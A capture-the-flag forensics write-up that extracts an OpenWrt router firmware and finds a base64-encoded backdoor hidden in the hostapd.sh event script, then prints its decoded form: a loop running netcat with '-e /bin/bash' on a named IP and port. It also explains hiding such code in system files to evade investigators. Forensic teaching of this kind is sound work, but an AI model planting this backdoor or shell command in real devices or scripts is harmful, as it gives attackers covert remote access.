In this post, I’ll be describing how I solved Digital Forensics Challenges
I know your secrets:
Description: our beloved hacker who hacked the SCADA system in the earlier challenge, got arrested and while examining their router, our investigators found out it was compromised as
well. Could you get the IP and port of the attacker who hacked the router? Flag Format: ASCWG{IP:Port}
We are given a squashfs file this is an OpenWrt firmware
We can use binwalk to extract it i will use sasquatch
As we know from the description, it’s router firmware.
Simple info about it
NAME=”OpenWrt”
VERSION=”23.05.4"
ID=”openwrt”
ID_LIKE=”lede openwrt”
PRETTY_NAME=”OpenWrt 23.05.4"
VERSION_ID=”23.05.4"
HOME_URL=”https://openwrt.org/"
BUG_URL=”https://bugs.openwrt.org/"
SUPPORT_URL=”https://forum.openwrt.org/"
BUILD_ID=”r24012-d8dd03c46f”
OPENWRT_BOARD=”ipq806x/generic”
OPENWRT_ARCH=”arm_cortex-a15_neon-vfpv4"
OPENWRT_TAINTS=””
OPENWRT_DEVICE_MANUFACTURER=”OpenWrt”
OPENWRT_DEVICE_MANUFACTURER_URL=”https://openwrt.org/"
OPENWRT_DEVICE_PRODUCT=”Generic”
OPENWRT_DEVICE_REVISION=”v0"
OPENWRT_RELEASE=”OpenWrt 23.05.4 r24012-d8dd03c46f”
After extracting all files, we can now begin investigation.
What specific elements should we be searching for? Let’s begin by conducting a thorough search for boot process
After conducting a standard examination to identify any potential malicious code or persistence, and after checking firewall rules, we found nothing suspicious.
Let’s approach this from a hacker’s perspective. Standard methods are easily detectable by investigators, so we could embed malicious code within system files to evade detection. Additionally, creating a file that establishes a connection whenever a device connects to the router could provide covert access.
hostapd.sh:
- is a user space daemon software that is used to create wireless access points (APs) in Linux environments. It manages the authentication, association, and encryption of wireless clients.
This topic also discusses this matter. Run a script for hostapd events
create_new_session() {
WTJ4aGMzTWdRbUZqYTJSdmIzSWdld29nSUdKaFkydGtiMjl5WDJsd1BTSTBNUzR4TWprdU1UZzJMall6SWdvZ0lHSmhZMnRrYjI5eVgzQnZjblE5SWpVd01UVTRJZ29LSUNCdFpYUm9iMlFnYjNCbGJsOWlZV05yWkc5dmNpZ3BJSHNLSUNBZ0lIZG9hV3hsSUhSeWRXVTdJR1J2Q2lBZ0lDQWdJRzVqSUMxc2RpQWtZbUZqYTJSdmIzSmZhWEFnSkdKaFkydGtiMjl5WDNCdmNuUWdMV1VnTDJKcGJpOWlZWE5vQ2lBZ0lDQmtiMjVsQ2lBZ2ZRcDk=
}After decoding it from Base64.
class Backdoor {
backdoor_ip="41.129.186.63"
backdoor_port="50158"
method open_backdoor() {
while true; do
nc -lv $backdoor_ip $backdoor_port -e /bin/bash
done
}
}FLAG: ASCWG{41.129.186.63:50158}
